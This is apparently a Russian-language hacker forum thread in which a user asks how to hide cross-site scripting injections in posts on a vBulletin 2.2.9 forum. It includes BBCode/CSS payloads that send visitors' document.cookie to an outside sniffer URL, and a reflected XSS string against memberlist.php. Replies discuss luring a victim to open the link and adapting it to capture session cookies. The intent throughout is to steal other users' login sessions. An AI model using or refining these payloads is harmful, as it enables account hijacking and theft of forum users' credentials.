|
Как можно зашифровать инъекцию на форум так чтобы ее видно не было?
Есть форум vBulletin 2.2.9
Судя по всему админы не поленились и закрыли (казалось бы все возможные дыры). Пробовал множество инъекций в сообщениях, но они все видны или видны на половину Пример: Вставлял: Код HTML:
[url]http://www.[url=http://wj.com/style=display:none,background:url(javascript:docum ent.images[1].src="http://antichat.ru/cgi-bin/s.jp g?"+document.cookie,) ]wj[/url][/url]Код HTML:
[url]http://www..src="http://antichat.ru/cgi-bin/s.jp g?"+document.cookie,) ]wj[/url]Хотелось бы побольше узнать про инъекции, как и что надо менять чтобы ее видно не было. Заранее спасибо. |
Если он выводит тебе сообщение, т.е. тот код что ты ввел, то значит он (код) не сработал => скрытие тебе не поможет, результатом работы кода (обычно) является алерт, или спи**ивание куков, и это никак не отображается... т.е. ты в сам код внедряешь свой код... так что те коды у тебя не работает.
|
Цитата:
Хорошо, а как это обойти ? |
Это нельзя "обойти", если код не работает - значит уже пропатчили, ищи другой код или уязвимости в этой версии форума. Поищи баги на СекЛабе(http://securitylab.ru)
|
Цитата:
вот: Код:
memberlist.php?ХХХs= ХХХ 23c37cf1af5d2ad05f49361b0407 ХХ ad9e&what=">"<Script>javascript:alert(document.cookie)</Script>а как достать нужные кукис пока не знаю (есть предложения ? ) |
Прально, чтобы добыть чужие кукис нужно чтобы другой чел открыл тему/пост с кодом, который пи*дит куки...
|
Цитата:
Дык чтобы использовать и получать чужие кукис это Код:
http://www.vbulletin.com/forum/memberlist.php? Х s Х = Х 23c37cf1af5d2ad05f49361b0407 ХХХ ad9e &what=">"<Scr*ipt>javascript:alert(document.cookie)</Scr*ipt> |
Кукисы берутся из клиента-броузера пользователя а не сервера, насколько я знаю.
|
Цитата:
правильно, но эту ссылку должна как я понимаю открывать Жертва + ссылку надо модернизировать чтоб на снифер снимать кукисы |
Ищи другой способ.
//модерам ЧТО за тупая привычка стирать нужные посты? |
| Время: 21:31 |